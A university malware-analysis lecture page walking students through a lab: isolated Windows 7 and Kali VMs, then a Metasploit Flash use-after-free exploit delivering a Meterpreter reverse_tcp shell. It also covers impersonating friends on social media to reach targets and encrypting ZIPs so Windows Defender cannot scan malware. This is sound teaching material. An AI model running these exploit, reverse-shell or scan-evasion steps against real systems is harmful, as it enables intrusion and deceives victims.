CS6038/CS5138 Malware Analysis, UC

Course content for UC Malware Analysis

View on GitHub
18 January 2018

VirtualBox Lab Example Attacks & Analysis

by

VirtualBox Lab Example Attacks & Analysis

This lecture introduces attack examples to the class. In class, we made it part-way through one attack, targeting Adobe Flash, but the slide deck actually covers another attack (from last year) that simulated phishing with a PDF attachment.

The following two attack strategies will be broken down

  1. Sending a user a link to click (such as via advertising-banners, or even a social media private message)
  2. Emailing a user a PDF document (such as a PDF on cats), while simulating a family member or other close personal or professional relation

PDF: Lecture W02-2

Adobe Acrobat Reader Version Archive

Adobe Flash Player Archive

Attack #1 - Adobe Flash

We begin this attack by identifying a target (or multiple targets) via Social Media. This attack comes with two immediate benefits for any asipiring attacker:

Some reference discussing recent attacks that had a social media component:

Once targets are selected, many social media platforms offer the ability to send unsolicited private mesages to anyone using the platform - so long as the sender also has an account (trivial to forge), and often without the advance requirement that either of them have connected previously in the platform. In the case of Facebook, LinkedIn, and others, an adversary may be able to identify accounts (and photos) of accounts that are “friends” or “colleagues” of your target(s), create impersonating accounts, and send unsolicited messages from those accounts. It may not be readily apparent to the recipient that they are not communicating with their friend/colleague.

Gather system information

The next step would be to attempt to gather information about the target’s computers. For example, what web browser they might be using. The details of accomplishing this is better left to a vulnerability assessment or network exploitation course. In our case, we are going to use a Windows computer with the following configuration:

Using this, we can deduce that an attack approach could involve delivering a malicious Flash movie (SWF file) that exploits some vulnerability in Adobe Flash and opens the door to arbitrary code execution. Flash contains a complete ActionScript interpreter (a dialect of ECMAScript, a.k.a. “JavaScript”). Historically, many of these scripting platforms have been a great vector for exploitation. The complex nature of a system that is required to provide a general purpose language platform for a server to deliver executable code to clients is often fraught with unexpected vulnerabilities. Flash (ActionScript), JavaScript (“browser exploits”), Java, and similar have all been responsible for notable exploits over the years.

With that, we have conceptually architected our first pieces of malware that we need to craft:

We are going to simulate the above.

Configure Windows 7 VM

We can fetch some Windows VMs from the following site, part of their Windows Developer Network:

What’s really great about the above site is that it offers VMs already packaged in Oracle VirtualBox-compatible OVA files. This can be imported into VirtualBox.

You should configure the VM with the following networking options (using the “Network” tabe of the Settings window for the VM). Do this for both the Kali and Windows 7 VMs:

Inside the Windows 7 VM, after it boots up, you will want to manually configure the network settings. You will want to give it the following settings:

You can use the following documentation from NETGEAR if you are unfamiliar with how to configure this:

Next, you’ll want to install the VirtualBox Guest Additions. After the VM is running, you can do this by choosing the “Insert Guest Additions CD Image…” option from the Devices menu. Once the virtual disc is inserted, you can open it in Windows Explorer and run VBoxWindowsAdditions-x86.exe, follow the instructions, choose the defaults, and it will get installed - prompting you to reboot windows afterward to complete installation.

Once Windows comes back up, it will likely be a bit more responsive, and you will now have the ability to use shared folders within the VM to marshal files between host and guest OS. From the “Devices” menu, choose Shared Folders and the Shared Folders Settings… choice within that submenu. You should be able to add a folder here. Often times, I simply add my Downloads folder - mainly because it often contains junk I don’t mind losing, as well as typically is the first landing point for anything I want to download from the Internet to put into my VM. For our example, we will do that. Once this shared folder is set up, you can open a new Explorer window and navigate to the following path in order to view its contents:

\\VBOXSVR\Downloads

Using our host, we download the Flash Player 18.0.0.194 bundle from the following page hosting most of the “previous” releases of Adobe Flash going back to 2010:

Download the ZIP file into your Downloads folder, and you should be able to view it in your Windows VM. Once opening the ZIP archive, you’ll see a number of files, including the following two installers for Windows:

You’ll want to install the second one, if you want Flash player to work in Microsoft IE, which is what this walk-through intends to target. Optionally, you could install the first package and try targeting Firefox, as an additional experiment.

Finally, you will want to use the Control Panel to disable the following services, as discussed earlier in the course:

As a note, the following vulnerability will be targeted in our simulated attack:

Configure Kali Linux VM (for attack)

Once your Windows VM is configured, you will want to similarly configure your network settings in the Kali VM you were provided with. In Kali, you can click on the status area in the top-right corner (where the icons are displayed) and it will display a drop-down menu. Choose the menu option saying “Wired connected” or similar and it should expand to reveal a menu option entitled “Wired Settings”. Click that choice and you’ll be presented with the dialog to enter your static network settings. Click the “gear” icon next to the first entry in the “Wired” configuration section, and when the next dialog appears (with a bunch of tabs at the top), click the “IPv4” tab. Choose “Manual” and make the following settings:

Finally, click “Apply”. After this change, as with the Win7 networking, it may be necessary to disconnect/reconnect the virtual network connection using VirtualBox’s UI.

Once connected, you should be able to ping the Windows7 VM using the following command, and the Kali VM should report to you a constant stream of ping responses showing it is working:

ping 192.168.34.2

Once complete, you’ve established both VMs are properly configured and you may get on with exploiting the VM.

Open Metasploit and prepare attack

More details to come.

Choose exploit:

use multi/browser/adobe_flash_hacking_team_uaf

Select payload to deliver with exploit:

set PAYLOAD windows/meterpreter/reverse_tcp

Configure exploit options:

set SRVHOST 192.168.34.1
set URIPATH /hello

Configure payload options:

set LHOST 192.168.34.1

Direct Web Browser to Download Exploit

In Windows 7 VM, open an IE window and direct browser to:

http://192.168.34.1:8080/hello

When the exploit is successful, you’ll receive a message similar to the following, indicating that a meterpreter session was successfully established:

Meterpreter session 1 opened (....)

Securely Encrypt ZIP Files for Transfer

Your host machine (that is, if you’re using Windows with Defender installed) will very possibly interfere with the transfer of files between VMs when using shared folders. A common workaround is to install the following on your Windows VMs:

Using the above, you can store files in an archive and encrypt the content such that Windows Defender is unable to scan it for malware (and thus won’t recognize it as malware, and thus won’t attempt to delete files you’re working with in your VM).

Here is some documentation on WinZip’s site:

For Linux, the approach is even easier, as the zip utility offers this feature from the command line.

you can use the following recipe to ZIP up malware.exe and store it, encrypted, in an archive:

zip -e badstuff.zip malware.exe

You will be prompted for a password. The Linux command-line tool accepts multiple files as well to put into the archive.

Windows (pretty much any version) can natively decrypt encrypted ZIP files, but you need the WinZip application in order to create new encrypted Zip files inside of Windows.

home

tags: malware virtualbox metasploit lecture